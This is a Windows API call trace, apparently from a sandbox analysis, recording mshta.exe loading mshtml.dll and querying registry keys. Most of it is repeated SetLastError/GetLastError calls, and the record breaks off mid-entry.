SetLastError (dwErrCode=0x0) [0060.089] GetLastError () returned 0x0 [0060.089] SetLastError (dwErrCode=0x0) [0060.089] GetLastError () returned 0x0 [0060.089] SetLastError (dwErrCode=0x0) [0060.089] GetLastError () returned 0x0 [0060.089] SetLastError (dwErrCode=0x0) [0060.089] GetLastError () returned 0x0 [0060.089] SetLastError (dwErrCode=0x0) [0060.089] GetLastError () returned 0x0 [0060.090] SetLastError (dwErrCode=0x0) [0060.090] GetLastError () returned 0x0 [0060.090] SetLastError (dwErrCode=0x0) [0060.090] GetLastError () returned 0x0 [0060.090] SetLastError (dwErrCode=0x0) [0060.090] GetLastError () returned 0x0 [0060.090] SetLastError (dwErrCode=0x0) [0060.090] GetLastError () returned 0x0 [0060.090] SetLastError (dwErrCode=0x0) [0060.090] GetLastError () returned 0x0 [0060.090] SetLastError (dwErrCode=0x0) [0060.090] GetLastError () returned 0x0 [0060.090] SetLastError (dwErrCode=0x0) [0060.090] GetLastError () returned 0x0 [0060.090] SetLastError (dwErrCode=0x0) [0060.090] GetLastError () returned 0x0 [0060.091] SetLastError (dwErrCode=0x0) [0060.091] GetLastError () 
returned 0x0 [0060.091] SetLastError (dwErrCode=0x0) [0060.091] GetLastError () returned 0x0 [0060.091] SetLastError (dwErrCode=0x0) [0060.091] GetLastError () returned 0x0 [0060.091] SetLastError (dwErrCode=0x0) [0060.091] GetLastError () returned 0x0 [0060.091] SetLastError (dwErrCode=0x0) [0060.091] GetLastError () returned 0x0 [0060.091] SetLastError (dwErrCode=0x0) [0060.091] GetLastError () returned 0x0 [0060.091] SetLastError (dwErrCode=0x0) [0060.091] GetLastError () returned 0x0 [0060.092] SetLastError (dwErrCode=0x0) [0060.092] GetLastError () returned 0x0 [0060.092] SetLastError (dwErrCode=0x0) [0060.092] GetLastError () returned 0x0 [0060.092] SetLastError (dwErrCode=0x0) [0060.092] GetLastError () returned 0x0 [0060.092] SetLastError (dwErrCode=0x0) [0060.092] GetLastError () returned 0x0 [0060.092] SetLastError (dwErrCode=0x0) [0060.092] GetLastError () returned 0x0 [0060.092] SetLastError (dwErrCode=0x0) [0060.092] GetLastError () returned 0x0 [0060.092] SetLastError (dwErrCode=0x0) [0060.092] GetLastError () returned 0x0 [0060.092] SetLastError (dwErrCode=0x0) [0060.092] GetLastError () returned 0x0 [0060.093] SetLastError (dwErrCode=0x0) [0060.093] GetLastError () returned 0x0 [0060.093] SetLastError (dwErrCode=0x0) [0060.093] GetLastError () returned 0x0 [0060.093] SetLastError (dwErrCode=0x0) [0060.093] GetLastError () returned 0x0 [0060.093] SetLastError (dwErrCode=0x0) [0060.093] GetLastError () returned 0x0 [0060.093] SetLastError (dwErrCode=0x0) [0060.093] GetLastError () returned 0x0 [0060.093] SetLastError (dwErrCode=0x0) [0060.093] GetLastError () returned 0x0 [0060.093] SetLastError (dwErrCode=0x0) [0060.093] GetLastError () returned 0x0 [0060.094] SetLastError (dwErrCode=0x0) [0060.094] GetLastError () returned 0x0 [0060.094] SetLastError (dwErrCode=0x0) [0060.094] GetLastError () returned 0x0 [0060.094] SetLastError (dwErrCode=0x0) [0060.094] GetLastError () returned 0x0 [0060.094] SetLastError (dwErrCode=0x0) [0060.094] GetLastError () 
returned 0x0 [0060.094] SetLastError (dwErrCode=0x0) [0060.094] GetLastError () returned 0x0 [0060.094] SetLastError (dwErrCode=0x0) [0060.094] GetLastError () returned 0x0 [0060.094] SetLastError (dwErrCode=0x0) [0060.094] GetLastError () returned 0x0 [0060.095] SetLastError (dwErrCode=0x0) [0060.095] GetLastError () returned 0x0 [0060.095] SetLastError (dwErrCode=0x0) [0060.095] GetLastError () returned 0x0 [0060.095] SetLastError (dwErrCode=0x0) [0060.095] GetLastError () returned 0x0 [0060.095] SetLastError (dwErrCode=0x0) [0060.095] GetLastError () returned 0x0 [0060.095] SetLastError (dwErrCode=0x0) [0060.095] GetLastError () returned 0x0 [0060.095] SetLastError (dwErrCode=0x0) [0060.095] GetLastError () returned 0x0 [0060.095] SetLastError (dwErrCode=0x0) [0060.095] GetLastError () returned 0x0 [0060.095] SetLastError (dwErrCode=0x0) [0060.095] GetLastError () returned 0x0 [0060.096] SetLastError (dwErrCode=0x0) [0060.096] GetLastError () returned 0x0 [0060.096] SetLastError (dwErrCode=0x0) [0060.096] GetLastError () returned 0x0 [0060.096] SetLastError (dwErrCode=0x0) [0060.096] GetLastError () returned 0x0 [0060.096] SetLastError (dwErrCode=0x0) [0060.096] GetLastError () returned 0x0 [0060.096] SetLastError (dwErrCode=0x0) [0060.096] GetLastError () returned 0x0 [0060.096] SetLastError (dwErrCode=0x0) [0060.096] GetLastError () returned 0x0 [0060.096] SetLastError (dwErrCode=0x0) [0060.096] GetLastError () returned 0x0 [0060.097] SetLastError (dwErrCode=0x0) [0060.097] GetLastError () returned 0x0 [0060.097] SetLastError (dwErrCode=0x0) [0060.097] GetLastError () returned 0x0 [0060.097] SetLastError (dwErrCode=0x0) [0060.097] GetLastError () returned 0x0 [0060.097] SetLastError (dwErrCode=0x0) [0060.097] GetLastError () returned 0x0 [0060.097] SetLastError (dwErrCode=0x0) [0060.097] GetLastError () returned 0x0 [0060.097] SetLastError (dwErrCode=0x0) [0060.097] GetLastError () returned 0x0 [0060.098] SetLastError (dwErrCode=0x0) [0060.098] GetLastError () 
returned 0x0 [0060.098] SetLastError (dwErrCode=0x0) [0060.098] GetLastError () returned 0x0 [0060.098] SetLastError (dwErrCode=0x0) [0060.098] GetLastError () returned 0x0 [0060.098] SetLastError (dwErrCode=0x0) [0060.098] GetLastError () returned 0x0 [0060.098] SetLastError (dwErrCode=0x0) [0060.098] GetLastError () returned 0x0 [0060.098] SetLastError (dwErrCode=0x0) [0060.098] GetLastError () returned 0x0 [0060.098] SetLastError (dwErrCode=0x0) [0060.098] GetLastError () returned 0x0 [0060.098] SetLastError (dwErrCode=0x0) [0060.098] GetLastError () returned 0x0 [0060.099] SetLastError (dwErrCode=0x0) [0060.099] GetLastError () returned 0x0 [0060.099] SetLastError (dwErrCode=0x0) [0060.099] GetLastError () returned 0x0 [0060.099] SetLastError (dwErrCode=0x0) [0060.099] GetLastError () returned 0x0 [0060.099] SetLastError (dwErrCode=0x0) [0060.099] GetLastError () returned 0x0 [0060.099] SetLastError (dwErrCode=0x0) [0060.099] GetLastError () returned 0x0 [0060.099] SetLastError (dwErrCode=0x0) [0060.099] GetLastError () returned 0x0 [0060.099] SetLastError (dwErrCode=0x0) [0060.099] GetLastError () returned 0x0 [0060.099] SetLastError (dwErrCode=0x0) [0060.100] GetLastError () returned 0x0 [0060.100] SetLastError (dwErrCode=0x0) [0060.100] GetLastError () returned 0x0 [0060.100] SetLastError (dwErrCode=0x0) [0060.100] GetLastError () returned 0x0 [0060.100] SetLastError (dwErrCode=0x0) [0060.100] GetLastError () returned 0x0 [0060.100] SetLastError (dwErrCode=0x0) [0060.100] GetLastError () returned 0x0 [0060.100] SetLastError (dwErrCode=0x0) [0060.100] GetLastError () returned 0x0 [0060.100] SetLastError (dwErrCode=0x0) [0060.100] GetLastError () returned 0x0 [0060.100] SetLastError (dwErrCode=0x0) [0060.100] GetLastError () returned 0x0 [0060.101] SetLastError (dwErrCode=0x0) [0060.101] GetLastError () returned 0x0 [0060.101] SetLastError (dwErrCode=0x0) [0060.101] GetLastError () returned 0x0 [0060.101] SetLastError (dwErrCode=0x0) [0060.101] GetLastError () 
returned 0x0 [0060.101] SetLastError (dwErrCode=0x0) [0060.101] GetLastError () returned 0x0 [0060.101] SetLastError (dwErrCode=0x0) [0060.101] GetLastError () returned 0x0 [0060.101] SetLastError (dwErrCode=0x0) [0060.101] GetLastError () returned 0x0 [0060.101] SetLastError (dwErrCode=0x0) [0060.101] GetLastError () returned 0x0 [0060.101] SetLastError (dwErrCode=0x0) [0060.101] GetLastError () returned 0x0 [0060.102] SetLastError (dwErrCode=0x0) [0060.102] GetLastError () returned 0x0 [0060.102] SetLastError (dwErrCode=0x0) [0060.102] GetLastError () returned 0x0 [0060.102] SetLastError (dwErrCode=0x0) [0060.102] GetLastError () returned 0x0 [0060.102] SetLastError (dwErrCode=0x0) [0060.102] GetLastError () returned 0x0 [0060.102] SetLastError (dwErrCode=0x0) [0060.102] GetLastError () returned 0x0 [0060.102] SetLastError (dwErrCode=0x0) [0060.102] GetLastError () returned 0x0 [0060.102] SetLastError (dwErrCode=0x0) [0060.102] GetLastError () returned 0x0 [0060.102] SetLastError (dwErrCode=0x0) [0060.102] GetLastError () returned 0x0 [0060.103] SetLastError (dwErrCode=0x0) [0060.103] GetLastError () returned 0x0 [0060.103] SetLastError (dwErrCode=0x0) [0060.103] GetLastError () returned 0x0 [0060.103] SetLastError (dwErrCode=0x0) [0060.103] GetLastError () returned 0x0 [0060.103] SetLastError (dwErrCode=0x0) [0060.103] GetLastError () returned 0x0 [0060.103] SetLastError (dwErrCode=0x0) [0060.103] GetLastError () returned 0x0 [0060.103] SetLastError (dwErrCode=0x0) [0060.103] GetLastError () returned 0x0 [0060.103] SetLastError (dwErrCode=0x0) [0060.103] GetLastError () returned 0x0 [0060.104] SetLastError (dwErrCode=0x0) [0060.104] GetLastError () returned 0x0 [0060.104] SetLastError (dwErrCode=0x0) [0060.104] GetLastError () returned 0x0 [0060.104] SetLastError (dwErrCode=0x0) [0060.104] GetLastError () returned 0x0 [0060.104] SetLastError (dwErrCode=0x0) [0060.104] GetLastError () returned 0x0 [0060.104] SetLastError (dwErrCode=0x0) [0060.104] GetLastError () 
returned 0x0 [0060.104] SetLastError (dwErrCode=0x0) [0060.104] GetLastError () returned 0x0 [0060.104] SetLastError (dwErrCode=0x0) [0060.104] GetLastError () returned 0x0 [0060.105] SetLastError (dwErrCode=0x0) [0060.105] GetLastError () returned 0x0 [0060.105] SetLastError (dwErrCode=0x0) [0060.105] GetLastError () returned 0x0 [0060.105] SetLastError (dwErrCode=0x0) [0060.105] GetLastError () returned 0x0 [0060.105] SetLastError (dwErrCode=0x0) [0060.105] GetLastError () returned 0x0 [0060.105] SetLastError (dwErrCode=0x0) [0060.105] GetLastError () returned 0x0 [0060.105] SetLastError (dwErrCode=0x0) [0060.105] GetLastError () returned 0x0 [0060.105] SetLastError (dwErrCode=0x0) [0060.106] GetLastError () returned 0x0 [0060.106] SetLastError (dwErrCode=0x0) [0060.106] GetLastError () returned 0x0 [0060.106] SetLastError (dwErrCode=0x0) [0060.106] GetLastError () returned 0x0 [0060.106] SetLastError (dwErrCode=0x0) [0060.106] GetLastError () returned 0x0 [0060.106] SetLastError (dwErrCode=0x0) [0060.106] GetLastError () returned 0x0 [0060.106] SetLastError (dwErrCode=0x0) [0060.106] GetLastError () returned 0x0 [0060.106] SetLastError (dwErrCode=0x0) [0060.106] GetLastError () returned 0x0 [0060.107] SetLastError (dwErrCode=0x0) [0060.107] GetLastError () returned 0x0 [0060.107] SetLastError (dwErrCode=0x0) [0060.107] GetLastError () returned 0x0 [0060.107] SetLastError (dwErrCode=0x0) [0060.107] GetLastError () returned 0x0 [0060.107] SetLastError (dwErrCode=0x0) [0060.107] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x264) returned 0x761610 [0060.107] GetLastError () returned 0x0 [0060.107] SetLastError (dwErrCode=0x0) [0060.107] GetLastError () returned 0x0 [0060.107] SetLastError (dwErrCode=0x0) [0060.107] GetLastError () returned 0x0 [0060.108] SetLastError (dwErrCode=0x0) [0060.108] GetLastError () returned 0x0 [0060.108] SetLastError (dwErrCode=0x0) [0060.108] GetLastError () returned 0x0 [0060.108] SetLastError (dwErrCode=0x0) [0060.108] 
GetLastError () returned 0x0 [0060.108] SetLastError (dwErrCode=0x0) [0060.108] GetLastError () returned 0x0 [0060.108] SetLastError (dwErrCode=0x0) [0060.108] GetLastError () returned 0x0 [0060.108] SetLastError (dwErrCode=0x0) [0060.108] GetLastError () returned 0x0 [0060.108] SetLastError (dwErrCode=0x0) [0060.108] GetLastError () returned 0x0 [0060.109] SetLastError (dwErrCode=0x0) [0060.109] GetLastError () returned 0x0 [0060.109] SetLastError (dwErrCode=0x0) [0060.109] GetLastError () returned 0x0 [0060.109] SetLastError (dwErrCode=0x0) [0060.109] GetLastError () returned 0x0 [0060.109] SetLastError (dwErrCode=0x0) [0060.109] GetLastError () returned 0x0 [0060.109] SetLastError (dwErrCode=0x0) [0060.109] GetLastError () returned 0x0 [0060.109] SetLastError (dwErrCode=0x0) [0060.109] GetLastError () returned 0x0 [0060.109] SetLastError (dwErrCode=0x0) [0060.109] GetLastError () returned 0x0 [0060.110] SetLastError (dwErrCode=0x0) [0060.110] GetLastError () returned 0x0 [0060.110] SetLastError (dwErrCode=0x0) [0060.110] GetLastError () returned 0x0 [0060.110] SetLastError (dwErrCode=0x0) [0060.110] GetLastError () returned 0x0 [0060.110] SetLastError (dwErrCode=0x0) [0060.110] GetLastError () returned 0x0 [0060.110] SetLastError (dwErrCode=0x0) [0060.110] GetLastError () returned 0x0 [0060.110] SetLastError (dwErrCode=0x0) [0060.110] GetLastError () returned 0x0 [0060.110] SetLastError (dwErrCode=0x0) [0060.110] GetLastError () returned 0x0 [0060.111] SetLastError (dwErrCode=0x0) [0060.111] GetLastError () returned 0x0 [0060.111] SetLastError (dwErrCode=0x0) [0060.111] GetLastError () returned 0x0 [0060.111] SetLastError (dwErrCode=0x0) [0060.111] GetLastError () returned 0x0 [0060.111] SetLastError (dwErrCode=0x0) [0060.111] GetLastError () returned 0x0 [0060.111] SetLastError (dwErrCode=0x0) [0060.111] GetLastError () returned 0x0 [0060.111] SetLastError (dwErrCode=0x0) [0060.111] GetLastError () returned 0x0 [0060.111] SetLastError (dwErrCode=0x0) [0060.111] 
GetLastError () returned 0x0 [0060.111] SetLastError (dwErrCode=0x0) [0060.112] GetLastError () returned 0x0 [0060.112] SetLastError (dwErrCode=0x0) [0060.112] GetLastError () returned 0x0 [0060.112] SetLastError (dwErrCode=0x0) [0060.112] GetLastError () returned 0x0 [0060.112] SetLastError (dwErrCode=0x0) [0060.112] GetLastError () returned 0x0 [0060.112] SetLastError (dwErrCode=0x0) [0060.112] GetLastError () returned 0x0 [0060.112] SetLastError (dwErrCode=0x0) [0060.112] GetLastError () returned 0x0 [0060.112] SetLastError (dwErrCode=0x0) [0060.112] GetLastError () returned 0x0 [0060.112] SetLastError (dwErrCode=0x0) [0060.112] GetLastError () returned 0x0 [0060.113] SetLastError (dwErrCode=0x0) [0060.113] GetLastError () returned 0x0 [0060.113] SetLastError (dwErrCode=0x0) [0060.113] GetLastError () returned 0x0 [0060.113] SetLastError (dwErrCode=0x0) [0060.113] GetLastError () returned 0x0 [0060.113] SetLastError (dwErrCode=0x0) [0060.113] GetLastError () returned 0x0 [0060.113] SetLastError (dwErrCode=0x0) [0060.113] GetLastError () returned 0x0 [0060.113] SetLastError (dwErrCode=0x0) [0060.113] GetLastError () returned 0x0 [0060.113] SetLastError (dwErrCode=0x0) [0060.113] GetLastError () returned 0x0 [0060.113] SetLastError (dwErrCode=0x0) [0060.113] GetLastError () returned 0x0 [0060.114] SetLastError (dwErrCode=0x0) [0060.114] GetLastError () returned 0x0 [0060.114] SetLastError (dwErrCode=0x0) [0060.114] GetLastError () returned 0x0 [0060.114] SetLastError (dwErrCode=0x0) [0060.114] GetLastError () returned 0x0 [0060.114] SetLastError (dwErrCode=0x0) [0060.114] GetLastError () returned 0x0 [0060.114] SetLastError (dwErrCode=0x0) [0060.114] GetLastError () returned 0x0 [0060.114] SetLastError (dwErrCode=0x0) [0060.114] GetLastError () returned 0x0 [0060.115] SetLastError (dwErrCode=0x0) [0060.115] GetLastError () returned 0x0 [0060.115] SetLastError (dwErrCode=0x0) [0060.115] GetLastError () returned 0x0 [0060.115] SetLastError (dwErrCode=0x0) [0060.115] 
GetLastError () returned 0x0 [0060.115] SetLastError (dwErrCode=0x0) [0060.115] GetLastError () returned 0x0 [0060.115] SetLastError (dwErrCode=0x0) [0060.115] GetLastError () returned 0x0 [0060.115] SetLastError (dwErrCode=0x0) [0060.115] GetLastError () returned 0x0 [0060.115] SetLastError (dwErrCode=0x0) [0060.115] GetLastError () returned 0x0 [0060.115] SetLastError (dwErrCode=0x0) [0060.115] GetLastError () returned 0x0 [0060.116] SetLastError (dwErrCode=0x0) [0060.116] GetLastError () returned 0x0 [0060.116] SetLastError (dwErrCode=0x0) [0060.116] GetLastError () returned 0x0 [0060.116] SetLastError (dwErrCode=0x0) [0060.116] GetLastError () returned 0x0 [0060.116] SetLastError (dwErrCode=0x0) [0060.116] GetLastError () returned 0x0 [0060.116] SetLastError (dwErrCode=0x0) [0060.116] GetLastError () returned 0x0 [0060.116] SetLastError (dwErrCode=0x0) [0060.116] GetLastError () returned 0x0 [0060.116] SetLastError (dwErrCode=0x0) [0060.116] GetLastError () returned 0x0 [0060.116] SetLastError (dwErrCode=0x0) [0060.116] GetLastError () returned 0x0 [0060.117] SetLastError (dwErrCode=0x0) [0060.117] GetLastError () returned 0x0 [0060.117] SetLastError (dwErrCode=0x0) [0060.117] GetLastError () returned 0x0 [0060.117] SetLastError (dwErrCode=0x0) [0060.117] GetLastError () returned 0x0 [0060.117] SetLastError (dwErrCode=0x0) [0060.117] GetLastError () returned 0x0 [0060.117] SetLastError (dwErrCode=0x0) [0060.117] GetLastError () returned 0x0 [0060.117] SetLastError (dwErrCode=0x0) [0060.117] GetLastError () returned 0x0 [0060.117] SetLastError (dwErrCode=0x0) [0060.117] GetLastError () returned 0x0 [0060.118] SetLastError (dwErrCode=0x0) [0060.118] GetLastError () returned 0x0 [0060.118] SetLastError (dwErrCode=0x0) [0060.118] GetLastError () returned 0x0 [0060.118] SetLastError (dwErrCode=0x0) [0060.118] GetLastError () returned 0x0 [0060.118] SetLastError (dwErrCode=0x0) [0060.118] GetLastError () returned 0x0 [0060.118] SetLastError (dwErrCode=0x0) [0060.118] 
GetLastError () returned 0x0 [0060.118] SetLastError (dwErrCode=0x0) [0060.118] GetLastError () returned 0x0 [0060.118] SetLastError (dwErrCode=0x0) [0060.118] GetLastError () returned 0x0 [0060.118] SetLastError (dwErrCode=0x0) [0060.119] GetLastError () returned 0x0 [0060.119] SetLastError (dwErrCode=0x0) [0060.119] GetLastError () returned 0x0 [0060.119] SetLastError (dwErrCode=0x0) [0060.119] GetLastError () returned 0x0 [0060.119] SetLastError (dwErrCode=0x0) [0060.119] GetLastError () returned 0x0 [0060.119] SetLastError (dwErrCode=0x0) [0060.119] GetLastError () returned 0x0 [0060.119] SetLastError (dwErrCode=0x0) [0060.119] GetLastError () returned 0x0 [0060.119] SetLastError (dwErrCode=0x0) [0060.119] GetLastError () returned 0x0 [0060.119] SetLastError (dwErrCode=0x0) [0060.119] GetLastError () returned 0x0 [0060.120] SetLastError (dwErrCode=0x0) [0060.120] GetLastError () returned 0x0 [0060.120] SetLastError (dwErrCode=0x0) [0060.120] GetLastError () returned 0x0 [0060.120] SetLastError (dwErrCode=0x0) [0060.120] GetLastError () returned 0x0 [0060.120] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x5fc) returned 0x761880 [0060.120] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x760e78 | out: hHeap=0x760000) returned 1 [0060.121] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x972aef) returned 0x0 [0060.122] GetLastError () returned 0x0 [0060.122] GetVersion () returned 0x1db10106 [0060.122] GetModuleHandleW (lpModuleName="Kernel32.dll") returned 0x76d30000 [0060.122] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSetInformation") returned 0x76d45651 [0060.122] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0060.122] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x105) returned 0x761e88 [0060.122] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x105) returned 0x760e78 [0060.122] RegOpenKeyExA (in: hKey=0x80000000, 
lpSubKey="clsid\\{25336920-03f9-11cf-8fd0-00aa00686f13}\\InProcServer32", ulOptions=0x0, samDesired=0x1, phkResult=0x2cfad4 | out: phkResult=0x2cfad4*=0x42) returned 0x0 [0060.123] RegQueryValueExA (in: hKey=0x42, lpValueName=0x0, lpReserved=0x0, lpType=0x2cfacc, lpData=0x761e88, lpcbData=0x2cfac8*=0x105 | out: lpType=0x2cfacc*=0x1, lpData="C:\\Windows\\SysWOW64\\mshtml.dll", lpcbData=0x2cfac8*=0x1f) returned 0x0 [0060.123] LoadLibraryA (lpLibFileName="C:\\Windows\\SysWOW64\\mshtml.dll") returned 0x74af0000 [0064.850] GetProcessHeap () returned 0x410000 [0064.850] GetVersion () returned 0x1db10106 [0064.850] GetModuleHandleW (lpModuleName="Kernel32.dll") returned 0x76d30000 [0064.850] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSetInformation") returned 0x76d45651 [0064.850] HeapSetInformation (HeapHandle=0x410000, HeapInformationClass=0x0, HeapInformation=0x2cf760, HeapInformationLength=0x4) returned 1 [0064.926] malloc (_Size=0x80) returned 0x582640 [0064.926] GetVersion () returned 0x1db10106 [0065.003] GetVersionExA (in: lpVersionInformation=0x2cf638*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x2cf638*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0065.003] __dllonexit () returned 0x74d1717c [0065.003] __dllonexit () returned 0x74d173bd [0065.003] GetProcessHeap () returned 0x410000 [0065.003] __dllonexit () returned 0x74d17435 [0065.003] __dllonexit () returned 0x74d16e75 [0065.003] __dllonexit () returned 0x74d16ff5 [0065.003] __dllonexit () returned 0x74d171be [0065.003] __dllonexit () returned 0x74d172e2 [0065.004] __dllonexit () returned 0x74d17320 [0065.004] __dllonexit () returned 0x74d17370 [0065.004] __dllonexit () returned 0x74d16e53 [0065.004] __dllonexit () returned 0x74d16e66 [0065.004] __dllonexit () returned 0x74d16a3e [0065.004] 
__dllonexit () returned 0x74d16a46 [0065.004] RegisterClipboardFormatW (lpszFormat="CF_RTF") returned 0xc16e [0065.004] RegisterClipboardFormatW (lpszFormat="CF_RTF") returned 0xc16e [0065.004] __dllonexit () returned 0x74d16a60 [0065.005] __dllonexit () returned 0x74d16a7a [0065.005] __dllonexit () returned 0x74d16a93 [0065.005] __dllonexit () returned 0x74d16aa7 [0065.005] __dllonexit () returned 0x74d16ac1 [0065.005] __dllonexit () returned 0x74d171f1 [0065.005] __dllonexit () returned 0x74d16ad0 [0065.005] __dllonexit () returned 0x74d16adf [0065.005] __dllonexit () returned 0x74d16aee [0065.005] __dllonexit () returned 0x74d16afd [0065.006] __dllonexit () returned 0x74d16b0d [0065.006] __dllonexit () returned 0x74d1720c [0065.006] __dllonexit () returned 0x74d16b1c [0065.006] __dllonexit () returned 0x74d16b2f [0065.006] __dllonexit () returned 0x74d16b49 [0065.006] __dllonexit () returned 0x74d16b58 [0065.006] __dllonexit () returned 0x74d16b67 [0065.006] __dllonexit () returned 0x74d16b76 [0065.006] __dllonexit () returned 0x74d16b85 [0065.006] __dllonexit () returned 0x74d16b94 [0065.007] __dllonexit () returned 0x74d16ba3 [0065.007] __dllonexit () returned 0x74d16bb2 [0065.007] __dllonexit () returned 0x74d16bc1 [0065.007] __dllonexit () returned 0x74d16bd0 [0065.007] __dllonexit () returned 0x74d16bdf [0065.007] __dllonexit () returned 0x74d16bee [0065.007] __dllonexit () returned 0x74d16bfd [0065.007] __dllonexit () returned 0x74d16c0c [0065.007] __dllonexit () returned 0x74d16c1b [0065.008] __dllonexit () returned 0x74d16c2a [0065.008] __dllonexit () returned 0x74d16c3d [0065.008] __dllonexit () returned 0x74d16c4c [0065.008] __dllonexit () returned 0x74d16c5b [0065.008] __dllonexit () returned 0x74d16c75 [0065.008] __dllonexit () returned 0x74d16c8f [0065.008] __dllonexit () returned 0x74d16ca9 [0065.008] MulDiv (nNumber=1073741823, nNumerator=384, nDenominator=1440) returned 286331153 [0065.008] MulDiv (nNumber=1073741823, nNumerator=384, 
nDenominator=1440) returned 286331153 [0065.008] __dllonexit () returned 0x74d16cb1 [0065.009] __dllonexit () returned 0x74d17294 [0065.009] __dllonexit () returned 0x74d16ccb [0065.009] __dllonexit () returned 0x74d16cd3 [0065.009] __dllonexit () returned 0x74d16ce2 [0065.009] __dllonexit () returned 0x74d16cf1 [0065.009] __dllonexit () returned 0x74d16d00 [0065.009] __dllonexit () returned 0x74d0f72d [0065.010] __dllonexit () returned 0x74d16d43 [0065.010] __dllonexit () returned 0x74d16d56 [0065.010] __dllonexit () returned 0x74d0f095 [0065.010] __dllonexit () returned 0x74d16d65 [0065.010] __dllonexit () returned 0x74d16d78 [0065.010] __dllonexit () returned 0x74d16d87 [0065.010] __dllonexit () returned 0x74d16d9a [0065.011] __dllonexit () returned 0x74d12256 [0065.011] __dllonexit () returned 0x74d1679d [0065.011] __dllonexit () returned 0x74d16dd5 [0065.011] __dllonexit () returned 0x74d16df8 [0065.011] __dllonexit () returned 0x74d16e07 [0065.011] __dllonexit () returned 0x74d176cb [0065.012] __dllonexit () returned 0x74d16e1a [0065.012] __dllonexit () returned 0x74d172aa [0065.012] __dllonexit () returned 0x74d172cb [0065.012] __dllonexit () returned 0x74d16e3a [0065.012] GetCurrentThreadId () returned 0x90 [0065.012] CoCreateGuid (in: pguid=0x7502ad20 | out: pguid=0x7502ad20*(Data1=0xf96bccdd, Data2=0xf58d, Data3=0x446e, Data4=([0]=0x80, [1]=0x38, [2]=0x9b, [3]=0x70, [4]=0xbf, [5]=0x8b, [6]=0xd6, [7]=0xb2))) returned 0x0 [0065.014] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x200) returned 0x42e830 [0065.014] __dllonexit () returned 0x74d1733d [0065.014] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2cf0d8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0065.014] PathFindFileNameW (pszPath="C:\\Windows\\SysWOW64\\mshta.exe") returned="mshta.exe" [0065.014] StrCmpICW (pszStr1="mshta.exe", pszStr2="iexplore.exe") returned 4 [0065.015] StrCmpICW 
(pszStr1="mshta.exe", pszStr2="explorer.exe") returned 8 [0065.015] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x42ea38 [0065.015] SHRegGetValueW () returned 0x2 [0065.015] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf324 | out: phkResult=0x2cf324*=0x0) returned 0x2 [0065.015] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf320 | out: phkResult=0x2cf320*=0x0) returned 0x2 [0065.015] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf318 | out: phkResult=0x2cf318*=0x94) returned 0x0 [0065.015] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf31c | out: phkResult=0x2cf31c*=0x98) returned 0x0 [0065.084] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.104] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.104] RegCloseKey (hKey=0x0) returned 0x6 [0065.104] RegCloseKey (hKey=0x0) returned 0x6 [0065.104] RegCloseKey (hKey=0x94) returned 0x0 [0065.104] RegCloseKey (hKey=0x98) returned 0x0 [0065.105] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf318 | out: phkResult=0x2cf318*=0x98) returned 0x0 [0065.105] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, 
